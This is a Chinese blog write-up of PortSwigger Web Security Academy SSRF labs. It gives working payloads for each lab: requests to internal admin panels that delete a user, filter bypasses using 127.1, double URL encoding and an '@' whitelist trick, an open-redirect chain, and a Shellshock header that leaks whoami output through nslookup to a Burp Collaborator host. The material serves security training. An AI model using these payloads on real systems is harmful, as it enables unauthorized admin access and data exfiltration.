Portswigger靶场SSRF实验
作者:互联网
Portswigger靶场SSRF实验
针对本地服务器的基础SSRF
靶场
说明
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.
题解
随意浏览一个商品页面,点击check stock查询库存,发现发出了一个POST请求
其From data数据为:
stockApi:http://stock.weliketoshop.net:8080/product/stock/check?productId=2&storeId=1
伪造请求,控制台,尝试登入管理员后台
fetch('https://ac731fad1e7cf971c0a505b80009004c.web-security-academy.net/product/stock',{method:'POST', headers: {
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
}, body: "stockApi=http://localhost/admin})
查看响应,其中有删除用户按钮的a标签,链接是/admin/delete?username=carlos。伪造请求,成功删除
fetch('https://ac731fad1e7cf971c0a505b80009004c.web-security-academy.net/product/stock',{method:'POST', headers: {
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
}, body: "stockApi=http://localhost/admin/delete?username=carlos"})
针对另一个后端系统的基础SSRF
靶场
basic-ssrf-against-backend-system
说明
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.
题解
提交库存检查请求,将此请求发送至repeater,修改stockkApi字段
使用burpsuite intruder给该局域网下可能存在的主机发送请求,发现192.168.0.170可能是后台路由,返回了404状态
尝试对170发送请求进行后台登陆
http://192.168.0.170:8080/admin
查看响应,其中有删除用户按钮的a标签,链接是/admin/delete?username=carlos。伪造请求,成功删除
http://192.168.0.170:8080/admin/delete?username=carlos
基于黑名单对输入进行过滤的SSRF
靶场
说明
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.
The developer has deployed two weak anti-SSRF defenses that you will need to bypass.
题解
提交库存检查请求,将此请求发送至repeater,修改stockkApi字段
尝试使用常用后台登录地址
http://localhost:8080/admin
http://127.0.0.1:8080/admin
尝试变形
http://127.1:8080/admin \\blocked
对admin进行url编码
http://127.1:8080/%61dmin \\blocked
对%再进行编码
http://127.1:8080/%2561dmin \\成功
发现本体对localhost和127.0.0.1此类敏感ip地址和admin敏感词做了屏蔽
查看响应,其中有删除用户按钮的a标签,链接是/admin/delete?username=carlos。伪造请求,成功删除
http://127.1/%2561dmin/delete?username=carlos
基于白名单对输入进行过滤的SSRF
靶场
说明
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.
The developer has deployed an anti-SSRF defense you will need to bypass.
题解
http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos
通过重定向绕过过滤的SSRF
靶场
ssrf-filter-bypass-via-open-redirection
说明
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, change the stock check URL to access the admin interface at http://192.168.0.12:8080/admin and delete the user carlos.
The stock checker has been restricted to only access the local application, so you will need to find an open redirect affecting the application first.
题解
进入商品页面,注意到右下角有个Next product按钮,点击按钮,发现该请求的响应重定向到另一个商品。其请求url为:
https://acd71f141e5d1066c0e1311800a400ca.web-security-academy.net/product/nextProduct?currentProductId=1&path=/product?productId=2
能够造成查询本地服务器的请求是查询仓库请求,能发起重定向的参数是path,尝试构造请求
stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin
删除用户
/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
带外SSRF
靶场
说明
This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded.
To solve the lab, use this functionality to cause an HTTP request to the public Burp Collaborator server.
注意
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.
题解
如题,在请求头中新增一个Referer字段,值为burp的公共dns服务器,造成靶场服务器http请求即可
Referer: http://qwqwzb4hl8l5fsfwapepv89orfx5lu.burpcollaborator.net
利用Shellshock的盲SSRF
靶场
注意
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.
题解
本题使用了Shellshock(破壳漏洞)CVE-2014–6271
Bash在运行的过程中会调用操作系统的环境变量,并且会执行一些设置命令。
通过ShellShock漏洞,入侵者可以把某些”本来没有权限执行的语句或者命令“,注入到环境变量里。当bash设置环境变量的时候,就会执行这些”被注入“命令
靶场会对请求头的Referer来源网站进行统计分析,因此可以在Referer中进行SSRF攻击
Referer: http://192.168.0.1:8080
此处不太懂,将请求头User-Agent替换成Shellshock漏洞的playload,为什么服务器会执行User-Agent中的代码?
解释:原文链接:https://blog.csdn.net/fish43237/article/details/39609031
Linux WEB Server一般可以提供CGI接口,允许远程执行Bash命令;
对于HTTP头部,CGI脚本解析器会将其当作环境变量,调用bash的env相关函数设置到临时环境变量中;
HTTP协议允许发送任意客户端自定义的HTTP头部;
这样就产生了一个完整的可供Bash命令注入的场景,客户端故意发送构造好的带攻击命令的HTTP头部到服务端,服务端调用设置环境变量的函数,直接执行了客户端指定的头部里面的命令。并且还会将结果一并返回给客户端。
服务器的CGI接口将User-Agent的内容当作环境变量,调用bash的env相关函数设置到临时环境变量中。服务端调用设置环境变量的函数,触发了Shellshock漏洞,直接执行了客户端指定的头部里面的命令。
在header头的任何位置添加你想执行的脚本都可以,不一定非得是User-Agent
0klo95947boi08knziv98mqe85ev2k.burpcollaborator.net为burp生成的公共dns服务器,用以接收前面带外攻击$(whoami)的数据
将此playload替换header头的任何一个字段值
() { :; }; /usr/bin/nslookup $(whoami).0klo95947boi08knziv98mqe85ev2k.burpcollaborator.net
获得whoami用户名peter-9NpLEr,提交通过
标签:http,SSRF,admin,Portswigger,lab,8080,靶场,carlos,stock 来源: https://www.cnblogs.com/zhoujinxuan/p/16292419.html